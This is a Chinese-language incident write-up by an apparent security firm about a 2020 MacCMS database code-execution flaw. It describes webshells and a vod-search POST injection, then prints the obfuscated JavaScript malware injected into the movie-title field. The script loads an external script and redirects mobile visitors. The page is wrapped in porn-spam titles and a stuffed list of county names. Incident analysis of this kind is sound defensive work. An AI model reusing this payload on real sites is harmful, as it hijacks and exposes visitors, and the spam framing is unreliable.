69久久精品无码一区二区|99在线精品免费视频九九视|亚洲中文字幕91视频|亚洲精品成人片在线观看

產(chǎn)品描述


2020年剛開(kāi)始,蘋果CMS被爆出數(shù)據(jù)庫(kù)代碼執(zhí)行漏洞,大量的電影網(wǎng)站被掛馬,尤其電影的頁(yè)面被篡改植入了惡意代碼,數(shù)據(jù)庫(kù)中的VOD表里的d_name被全部修改,導(dǎo)致網(wǎng)站打開(kāi)后直接跳轉(zhuǎn)到S站或者彈窗廣告,目前該maccms漏洞受影響的蘋果系統(tǒng)版本是V8,V10,很多客戶網(wǎng)站被反復(fù)篡改,很無(wú)奈,通過(guò)朋友介紹找到我們SINE安全尋求技術(shù)上支持,防止網(wǎng)站被掛馬。根據(jù)客戶的反應(yīng),服務(wù)器采用的是linux centos系統(tǒng),蘋果CMS版本是較新的V10版本,我們立即成立網(wǎng)站安全應(yīng)急響應(yīng)處理,幫助客戶解決網(wǎng)站被攻擊的問(wèn)題。

首先很多站長(zhǎng)以為升級(jí)了蘋果CMS官方較新的漏洞補(bǔ)丁就沒(méi)問(wèn)題了,通過(guò)我們SINE安全技術(shù)對(duì)補(bǔ)丁的代碼安全分析發(fā)現(xiàn),該漏洞補(bǔ)丁對(duì)當(dāng)前的數(shù)據(jù)庫(kù)代碼執(zhí)行漏洞是沒(méi)有任何效果的,于事無(wú)補(bǔ),網(wǎng)站還會(huì)繼續(xù)被攻擊。

我們來(lái)看下客戶網(wǎng)站目前發(fā)生的掛馬問(wèn)題,打開(kāi)網(wǎng)站首頁(yè)以及各個(gè)電影地址都會(huì)被插入掛馬代碼,如下圖所示:

打包壓縮了一份網(wǎng)站源代碼,以及nginx網(wǎng)站日志文件,我們SINE安全滲透工程師在根目錄下發(fā)現(xiàn)被上傳了網(wǎng)站webshell木馬文件,通過(guò)網(wǎng)站日志溯源追蹤我們查看到訪問(wèn)這個(gè)PHP腳本木馬文件的是一個(gè)韓國(guó)的IP,具體的代碼如下圖:

代碼做了加密處理,我們SINE安全對(duì)其解密發(fā)現(xiàn)該代碼的功能可以對(duì)網(wǎng)站進(jìn)行上傳,下載,修改代碼,操作數(shù)據(jù)庫(kù)等功能,屬于PHP大馬的范疇,也叫webshell木馬文件,我們又對(duì)蘋果CMS的源代碼進(jìn)行了人工安全審計(jì),發(fā)現(xiàn)index.php代碼對(duì)搜索模塊上做的一些惡意代碼過(guò)濾檢查存在漏洞,可導(dǎo)致攻擊者繞過(guò)安全過(guò)濾,直接將SQL插入代碼執(zhí)行到數(shù)據(jù)庫(kù)當(dāng)中去。

我們對(duì)數(shù)據(jù)庫(kù)進(jìn)行安全檢測(cè)發(fā)現(xiàn),在VOD表的d_name被批量植入了掛馬代碼:



eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(newPRegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('4.5(\'<61="3/2" 7="http://0.b.c.d/8.0"><\\/9\'+\'a>\');',14,14,'js|type|javascript|text|document|write|script|src|20487493|scr|ipt|users|51|la'.split('|'),0,{}));var LOUMtBZeW=navigator["userAgent"]["toLowerCase"]()["match"](/(ipod|iphone|ipad|android|coolpad|mmp|smartphone|midp|wap|xoom|symbian|j2me|blackberry|wince)/i)!=null;if(LOUMtBZeW){setTimeout('window.location.href=""',500)}

這手法很專業(yè),不是一般的攻擊者所為,針對(duì)手機(jī)端做了跳轉(zhuǎn)以及隱藏嵌入,讓網(wǎng)站運(yùn)營(yíng)者根本無(wú)法察覺(jué)發(fā)現(xiàn),還判斷了cookies來(lái)路,達(dá)到條件才能觸發(fā)攻擊者植入的廣告代碼。繼續(xù)安全分析與追蹤,發(fā)現(xiàn)了攻擊者的手法,POST提交到/index.php?m=vod-search,POST內(nèi)容是加密的這里就不方便發(fā)出了,屬于漏洞攻擊了,可能會(huì)給其他使用蘋果CMS系統(tǒng)的網(wǎng)站造成攻擊,我們SINE安全技術(shù)對(duì)POST攻擊代碼進(jìn)行了解密分析,發(fā)現(xiàn)確實(shí)是繞過(guò)了蘋果官方V8,V10系統(tǒng)的代碼安全過(guò)濾,直接將掛馬代碼插入到了數(shù)據(jù)庫(kù)里了。

問(wèn)題根源找到了,接下來(lái)我們對(duì)客戶的蘋果CMS漏洞進(jìn)行修復(fù),對(duì)POST提交過(guò)來(lái)的參數(shù)進(jìn)行嚴(yán)格的過(guò)濾與轉(zhuǎn)義,對(duì)vod-search含有的惡意字符進(jìn)行強(qiáng)制轉(zhuǎn)換,對(duì)惡意代碼進(jìn)行安全攔截,防止傳入到后端進(jìn)行數(shù)據(jù)庫(kù)里的代碼執(zhí)行。對(duì)網(wǎng)站代碼里存在的木馬后門進(jìn)行了全面的人工審計(jì)與檢查,共計(jì)發(fā)現(xiàn)5個(gè)后門,其余的在緩存目錄當(dāng)中,跟程序代碼混淆在一起,也都刪除了,對(duì)網(wǎng)站的后臺(tái)地址進(jìn)行了更改,之前后臺(tái)使用的地址被攻擊者掌握,對(duì)管理員的賬號(hào)密碼進(jìn)行了加強(qiáng),至此蘋果CMS網(wǎng)站被掛馬的問(wèn)題才得以徹底解決,如果您的maccms也被一直掛馬,自己懂代碼的話可以對(duì)POST到index.php的數(shù)據(jù)進(jìn)行安全攔截與檢查,防止惡意代碼的插入,如果不是太懂的話,建議找專業(yè)的網(wǎng)站安全公司來(lái)處理解決。



http://www.mmsped.com

產(chǎn)品推薦

保康县| 永胜县| 镇远县| 元朗区| 海南省| 宁化县| 五指山市| 慈利县| 溧水县| 波密县| 枣强县| 白玉县| 醴陵市| 萨嘎县| 拉萨市| 双柏县| 二连浩特市| 旌德县| 荥阳市| 汪清县| 辽阳县| 张北县| 库尔勒市| 鄂托克旗| 彰化市| 广饶县| 凤山县| 海南省| 汝城县| 涞源县| 乐业县| 镇原县| 赤城县| 禄丰县| 宜君县| 青岛市| 武乡县| 兰西县| 漳平市| 彭山县| 确山县|